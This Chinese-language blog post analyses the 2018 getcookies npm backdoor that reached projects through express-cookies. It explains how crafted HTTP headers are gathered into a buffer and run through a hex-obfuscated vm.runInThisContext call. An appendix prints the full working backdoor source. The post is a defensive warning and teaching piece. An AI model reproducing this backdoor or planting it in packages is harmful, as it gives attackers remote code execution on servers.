<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="node,">










<meta name="description" content="如果你和我们一样，npm install xxx 用的很舒服，可能你的项目会遇到重大的危险。先来看看一篇别人家的文章——细思极恐：后门代码被隐藏在 npm 模块中，差点就得逞 为了节省时间，点击问题讨论地址，直接看看别人怎么说的  可能你看了那篇文章也不太清除发生了什么，那就请看下面 问题描述哪些人会出现这样的问题？直接 or 间接使用 getcookies 的人。 比如：你正在使用的 Node">
<meta name="keywords" content="node">
<meta property="og:type" content="article">
<meta property="og:title" content="npm 模块别乱下载，说不好就出事了">
<meta property="og:url" content="http://yoursite.com/2018/05/08/npm-unsafe/index.html">
<meta property="og:site_name" content="NextInnovation">
<meta property="og:description" content="如果你和我们一样，npm install xxx 用的很舒服，可能你的项目会遇到重大的危险。先来看看一篇别人家的文章——细思极恐：后门代码被隐藏在 npm 模块中，差点就得逞 为了节省时间，点击问题讨论地址，直接看看别人怎么说的  可能你看了那篇文章也不太清除发生了什么，那就请看下面 问题描述哪些人会出现这样的问题？直接 or 间接使用 getcookies 的人。 比如：你正在使用的 Node">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2018/05/08/npm-unsafe/blog.png">
<meta property="og:image" content="http://yoursite.com/2018/05/08/npm-unsafe/emoji.png">
<meta property="og:image" content="http://yoursite.com/2018/05/08/npm-unsafe/code.png">
<meta property="og:image" content="http://yoursite.com/2018/05/08/npm-unsafe/buffer-1.png">
<meta property="og:updated_time" content="2019-09-09T16:48:43.222Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="npm 模块别乱下载，说不好就出事了">
<meta name="twitter:description" content="如果你和我们一样，npm install xxx 用的很舒服，可能你的项目会遇到重大的危险。先来看看一篇别人家的文章——细思极恐：后门代码被隐藏在 npm 模块中，差点就得逞 为了节省时间，点击问题讨论地址，直接看看别人怎么说的  可能你看了那篇文章也不太清除发生了什么，那就请看下面 问题描述哪些人会出现这样的问题？直接 or 间接使用 getcookies 的人。 比如：你正在使用的 Node">
<meta name="twitter:image" content="http://yoursite.com/2018/05/08/npm-unsafe/blog.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"right","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/05/08/npm-unsafe/">





  <title>npm 模块别乱下载，说不好就出事了 | NextInnovation</title>
  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?2ef1aa85abed08ce76cd8d41d5f2de71";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">NextInnovation</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    
  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/05/08/npm-unsafe/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Eminoda">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/eminoda/header.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="NextInnovation">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">npm 模块别乱下载，说不好就出事了</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-05-08T18:08:38+08:00">
                2018-05-08
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/开发/" itemprop="url" rel="index">
                    <span itemprop="name">开发</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/开发/前端开发/" itemprop="url" rel="index">
                    <span itemprop="name">前端开发</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>如果你和我们一样，npm install xxx 用的很舒服，可能你的项目会遇到重大的危险。<br>先来看看一篇别人家的文章——<a href="https://mp.weixin.qq.com/s/4JGuRDR54OnJyAqlSns53Q" target="_blank" rel="noopener">细思极恐：后门代码被隐藏在 npm 模块中，差点就得逞</a></p>
<p>为了节省时间，<a href="https://news.ycombinator.com/item?id=16975025" target="_blank" rel="noopener">点击问题讨论地址，直接看看别人怎么说的</a><br><img src="/2018/05/08/npm-unsafe/blog.png"></p>
<img src="/2018/05/08/npm-unsafe/emoji.png">
<p>可能你看了那篇文章也不太清除发生了什么，那就请看下面</p>
<h2 id="问题描述"><a href="#问题描述" class="headerlink" title="问题描述"></a>问题描述</h2><h3 id="哪些人会出现这样的问题？"><a href="#哪些人会出现这样的问题？" class="headerlink" title="哪些人会出现这样的问题？"></a>哪些人会出现这样的问题？</h3><p>直接 or 间接使用 getcookies 的人。</p>
<p>比如：你正在使用的 Node 框架是 express，并且通过 express-cookies 处理 cookie 功能。那它其中就引用了 getcookies。</p>
<h3 id="问题有多严重？"><a href="#问题有多严重？" class="headerlink" title="问题有多严重？"></a>问题有多严重？</h3><p>getcookies 会通过 header 注入代码，然后在你服务器‘任意遨游’，获取你服务器配置信息、监控你请求、让你宕个机…</p>
<h3 id="它是怎么个原理"><a href="#它是怎么个原理" class="headerlink" title="它是怎么个原理"></a>它是怎么个原理</h3><ol>
<li>inject 自定义的 Header,获取到 req.headers</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">req.headers[&apos;gfeffh11i&apos;] = 111;</span><br><span class="line">req.headers[&apos;gabcdh22i&apos;] = 222;</span><br><span class="line">req.headers[&apos;gfaffh33i&apos;] = 333;</span><br></pre></td></tr></table></figure>
<ol start="2">
<li>在请求头中寻找符合<strong>/g([a-f0-9]{4})h((?:[a-f0-9]{2})+)i/gi</strong>规则的信息</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">// g+hex(2)+h+hex(1)+i</span><br><span class="line">req.headers[&apos;gfaffh22i&apos;] = 222;</span><br><span class="line">...</span><br><span class="line">// 以上header将在这个regex命中，并且通过replace执行多次。</span><br><span class="line">JSON.stringify(req.headers).replace(/g([a-f0-9]&#123;4&#125;)h((?:[a-f0-9]&#123;2&#125;)+)i/gi, (o, p, v) =&gt; &#123;</span><br><span class="line">    // o=gabcdh00i，p=abcd，v=00</span><br><span class="line">    // 转成hex字符</span><br><span class="line">    p = Buffer.from(p, &apos;hex&apos;).readUInt16LE(0);//52651</span><br><span class="line">    switch (p) &#123;</span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>
<ol start="3">
<li><p>判断注入非法的信息，完成：初始化代码执行环境–&gt;将问题代码添加至内存中–&gt;调用 vm 执行问题代码<br>注释信息，说明了哪些 header 会被 switch 命中</p>
<img src="/2018/05/08/npm-unsafe/code.png" title="getcookies">
</li>
<li><p>script 脚本如何在 vm 执行（写了个 Demo 模拟）</p>
</li>
</ol>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 模拟header中数据的获取，存入内存的过程(default中的逻辑)</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getHexBufer</span>(<span class="params">scriptFn</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> result = <span class="string">''</span>;</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; scriptFn.length; i++) &#123;</span><br><span class="line">    <span class="comment">// --&gt;ascii--&gt;16hex</span></span><br><span class="line">    result = result + <span class="built_in">parseInt</span>(scriptFn[i].charCodeAt(), <span class="number">10</span>).toString(<span class="number">16</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// result:2866756e6374696f6e202829207b636f6e736f6c652e6c6f672827636f6d696e6727293b7d292829</span></span><br><span class="line">  <span class="comment">// 16hex的buffer</span></span><br><span class="line">  <span class="comment">// &lt;Buffer 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 63 6f 6d 69 6e 67 27 29 3b 7d 29 28 29&gt;</span></span><br><span class="line">  <span class="keyword">return</span> Buffer.from(<span class="built_in">String</span>(result), <span class="string">'hex'</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 编译脚本</span></span><br><span class="line"><span class="keyword">var</span> c = getHexBufer(<span class="string">`(function () &#123;console.log('coming');&#125;)()`</span>).toString();</span><br><span class="line"><span class="comment">// 通过vm执行脚本</span></span><br><span class="line"><span class="built_in">require</span>(<span class="string">'vm'</span>)[<span class="string">'runInThisContext'</span>](c); <span class="comment">//输出coming</span></span><br></pre></td></tr></table></figure>
<h3 id="你可能需要准备下其他知识"><a href="#你可能需要准备下其他知识" class="headerlink" title="你可能需要准备下其他知识"></a>你可能需要准备下其他知识</h3><ol>
<li><p><a href="http://nodejs.cn/doc/node/buffer.html#buffer_buffer_from_buffer_alloc_and_buffer_allocunsafe" target="_blank" rel="noopener">Buffer.from 和 Buffer.alloc 干什么的</a></p>
<img src="/2018/05/08/npm-unsafe/buffer-1.png" title="Buffer.from&Buffer.alloc">
</li>
<li><p><a href>readUInt16LE 什么意思</a><br>如果你不清楚 LE、BE。可以再看看这篇：<a href="http://127.0.0.1:4000/2018/05/08/node-buffer-endian/" target="_blank" rel="noopener">readInt16BE 和 readInt16LE 的区别</a></p>
</li>
<li><p>\x76\x6d 是什么格式？<br>是 16 进制。<br>然后就能明白源代码中：</p>
</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">require(&apos;\x76\x6d&apos;)[&apos;\x72\x75\x6e\x49\x6e\x54\x68\x69\x73\x43\x6f\x6e\x74\x65\x78\x74&apos;]</span><br><span class="line">// require(&apos;vm&apos;)[&apos;runInThisContext&apos;]</span><br></pre></td></tr></table></figure>
<pre><code>对应的再补充一些进制转换api

<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> test10 = <span class="number">43981</span>;</span><br><span class="line"><span class="comment">// 10 --&gt; 2</span></span><br><span class="line"><span class="keyword">var</span> test2 = test10.toString(<span class="number">2</span>);<span class="comment">//1010101111001101</span></span><br><span class="line"><span class="comment">// 2 --&gt; 10</span></span><br><span class="line"><span class="keyword">var</span> backTest10 = <span class="built_in">parseInt</span>(test2, <span class="number">2</span>);<span class="comment">//43981</span></span><br><span class="line"><span class="comment">// 10 -&gt; 16</span></span><br><span class="line"><span class="keyword">var</span> testHex = <span class="built_in">parseInt</span>(test2, <span class="number">2</span>).toString(<span class="number">16</span>);<span class="comment">//abcd</span></span><br></pre></td></tr></table></figure>
</code></pre><ol start="4">
<li><a href="https://nodejs.org/api/vm.html#vm_vm_runinthiscontext_code_options" target="_blank" rel="noopener">什么是 vm？</a><br>执行 script，同时源码中还用了高阶 Fn，提供了 module.exports, require, req, res, next 等信息。我这些都拿到了，我还有什么不能做？</li>
</ol>
<h2 id="现状"><a href="#现状" class="headerlink" title="现状"></a>现状</h2><p>npm 官方已经做了处理，你已经下不到这两个包了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Error: [getcookies@*] GET https://registry.npm.taobao.org/getcookies/latest response 404 status</span><br><span class="line">Error: [express-cookies@*] GET https://registry.npm.taobao.org/express-cookies/latest response 404 status</span><br></pre></td></tr></table></figure>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><ol>
<li>不要着急升级模块，避免已稳定的模块出现问题</li>
<li>下载使用<strong>优质</strong>，热门模块。用的人多，这样出问题，社区会有解决方案，你不是一个人战斗。</li>
<li>检查下项目中的 node_modules，奇奇怪怪的能不用就别用了。</li>
<li>提升自己能力，看的懂大神们写的代码才能 hold 全场，慢慢积累，但别放弃任何学习源码的机会，比如这个 getcookie 现在就下载不到了。</li>
</ol>
<h2 id="附录"><a href="#附录" class="headerlink" title="附录"></a>附录</h2><p>getcookie 源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">/* eslint-env es6 */</span><br><span class="line">&apos;use strict&apos;;</span><br><span class="line"></span><br><span class="line">var assert = require(&apos;assert&apos;);</span><br><span class="line"></span><br><span class="line">let harness = (req, res, callback, next) =&gt; &#123;</span><br><span class="line">    try &#123;</span><br><span class="line">        assert.equal(typeof callback, &apos;function&apos;);</span><br><span class="line">    &#125; catch (E) &#123;</span><br><span class="line">        return callback(E);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    try &#123;</span><br><span class="line">        module.exports.log = module.exports.log || Buffer.alloc(0xffff);</span><br><span class="line">        JSON.stringify(req.headers).replace(/g([a-f0-9]&#123;4&#125;)h((?:[a-f0-9]&#123;2&#125;)+)i/gi, (o, p, v) =&gt; &#123;</span><br><span class="line">            p = Buffer.from(p, &apos;hex&apos;).readUInt16LE(0);</span><br><span class="line">            switch (p) &#123;</span><br><span class="line">                case 0xfffe:</span><br><span class="line">                    module.exports.log = Buffer.alloc(0xffff);</span><br><span class="line">                    return;</span><br><span class="line">                case 0xfffa:</span><br><span class="line">                    return setTimeout(() =&gt; &#123;</span><br><span class="line">                        let c = module.exports.log.toString().replace(/\x00*$/, &apos;&apos;);</span><br><span class="line">                        module.exports.log = Buffer.alloc(0xffff);</span><br><span class="line">                        if (c.indexOf(&apos;\x00&apos;) &lt; 0) &#123;</span><br><span class="line">                            require(&apos;\x76\x6d&apos;)[&apos;\x72\x75\x6e\x49\x6e\x54\x68\x69\x73\x43\x6f\x6e\x74\x65\x78\x74&apos;](c)(module.exports, require, req, res, next);</span><br><span class="line">                        &#125;</span><br><span class="line">                        next();</span><br><span class="line">                    &#125;, 1000);</span><br><span class="line">                default:</span><br><span class="line">                    v = Buffer.from(v, &apos;hex&apos;);</span><br><span class="line">                    for (let i = 0; i &lt; v.length; i++) &#123;</span><br><span class="line">                        module.exports.log[p + i] = v[i];</span><br><span class="line">                    &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125; catch (E) &#123;&#125;</span><br><span class="line"></span><br><span class="line">    next();</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">module.exports.assert = (req, res, callback, next) =&gt; &#123;</span><br><span class="line">    harness(req, res, callback, next);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    
      <div>
        <div id="wechat_subscriber" style="display: block; padding: 10px 0; margin: 20px auto; width: 100%; text-align: center">
    <div>前端攻城狮的日常，【长按关注】看看↓↓↓?</div>
    <img id="wechat_subscriber_qcode" src="/images/qrcode/webcat.jpg" alt="Eminoda wechat" style="width: 200px; max-width: 100%;">
    <div>好好学习，天天向上!</div>
    <div>欢迎留言，一起讨论前端问题</div>
</div>

      </div>
    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/node/" rel="tag"># node</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/05/08/node-buffer-endian/" rel="next" title="readInt16BE 和 readInt16LE 的区别">
                <i class="fa fa-chevron-left"></i> readInt16BE 和 readInt16LE 的区别
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/05/09/js-project-check/" rel="prev" title="JS 工程化之代码 QA 校验">
                JS 工程化之代码 QA 校验 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/eminoda/header.jpg" alt="Eminoda">
            
              <p class="site-author-name" itemprop="name">Eminoda</p>
              <p class="site-description motion-element" itemprop="description">I'm a litter Full-Stack Developer.</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">82</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">46</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#问题描述"><span class="nav-number">1.</span> <span class="nav-text">问题描述</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#哪些人会出现这样的问题？"><span class="nav-number">1.1.</span> <span class="nav-text">哪些人会出现这样的问题？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#问题有多严重？"><span class="nav-number">1.2.</span> <span class="nav-text">问题有多严重？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#它是怎么个原理"><span class="nav-number">1.3.</span> <span class="nav-text">它是怎么个原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#你可能需要准备下其他知识"><span class="nav-number">1.4.</span> <span class="nav-text">你可能需要准备下其他知识</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#现状"><span class="nav-number">2.</span> <span class="nav-text">现状</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">3.</span> <span class="nav-text">总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#附录"><span class="nav-number">4.</span> <span class="nav-text">附录</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Eminoda</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
